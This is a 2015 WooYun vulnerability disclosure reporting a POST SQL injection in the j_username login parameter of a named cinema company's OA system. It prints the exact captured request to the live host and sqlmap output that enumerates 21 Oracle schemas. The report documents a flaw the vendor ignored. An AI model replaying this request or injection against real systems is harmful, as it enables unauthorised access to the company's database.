当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0145608

漏洞标题:金逸影城某后台post注入

相关厂商:广州金逸影城有限公司

漏洞作者: Rand0m

提交时间:2015-10-09 20:02

修复时间:2015-11-23 20:04

公开时间:2015-11-23 20:04

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-10-09: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-11-23: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

RT

详细说明:

分站后台POST注入

oa.jycinema.com:7890/easoa/login/kingdee_sso_auth.jsp


抓包

POST /easoa/login/kingdee_sso_auth.jsp HTTP/1.1
Host: oa.jycinema.com:7890
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://oa.jycinema.com:7890/easoa/themes/mskin/login/login.jsp?login_error=1
Cookie: JSESSIONID=93FAD348D0678DA8243338D317B90AB8; Hm_lvt_adf5d51b91f5f12a36b09c0fe5f761df=1444390267; Hm_lpvt_adf5d51b91f5f12a36b09c0fe5f761df=1444390314; userClose=0; clientlanguage=zh_CN
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 83
j_mode=static&j_from=oa&j_locale=zh_CN&j_username=admin&j_password=111&Submit=login


j_username参数存在注入
Oracle+JSP
附上厂商联系方式:
广州金逸影视传媒股份有限公司
地址:广州市天河区珠江新城华成路8号礼顿阳光大厦4楼
邮编:510623
电话:020-87513960

漏洞证明:

web application technology: JSP
back-end DBMS: Oracle
[19:45:51] [WARNING] schema names are going to be used on Oracle for enumeration
 as the counterpart to database names on other DBMSes
[19:45:51] [INFO] fetching database (schema) names
[19:45:56] [INFO] the SQL query used returns 21 entries
[19:45:59] [INFO] retrieved: APEX_030200
[19:46:02] [INFO] retrieved: APPQOSSYS
[19:46:05] [INFO] retrieved: CTXSYS
[19:46:08] [INFO] retrieved: DBSNMP
[19:46:11] [INFO] retrieved: EASDB
[19:46:14] [INFO] retrieved: EXFSYS
[19:46:17] [INFO] retrieved: FLOWS_FILES
[19:46:20] [INFO] retrieved: MDSYS
[19:46:50] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is
 going to retry the request
[19:46:54] [INFO] retrieved: OLAPSYS
[19:46:58] [INFO] retrieved: ORDDATA
[19:47:01] [INFO] retrieved: ORDSYS
[19:47:03] [INFO] retrieved: OUTLN
[19:47:07] [INFO] retrieved: OWBSYS
[19:47:10] [INFO] retrieved: RHEAS
[19:47:13] [INFO] retrieved: SCOTT
[19:47:15] [INFO] retrieved: SHEAS
[19:47:18] [INFO] retrieved: SYS
[19:47:21] [INFO] retrieved: SYSMAN
[19:47:24] [INFO] retrieved: SYSTEM
[19:47:27] [INFO] retrieved: WMSYS
[19:47:30] [INFO] retrieved: XDB
available databases [21]:
[*] APEX_030200
[*] APPQOSSYS
[*] CTXSYS
[*] DBSNMP
[*] EASDB
[*] EXFSYS
[*] FLOWS_FILES
[*] MDSYS
[*] OLAPSYS
[*] ORDDATA
[*] ORDSYS
[*] OUTLN
[*] OWBSYS
[*] RHEAS
[*] SCOTT
[*] SHEAS
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] WMSYS
[*] XDB

修复方案:

过滤,希望金逸可以加入乌云厂商提高安全性

版权声明:转载请注明来源 Rand0m@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝

漏洞Rank:15 (WooYun评价)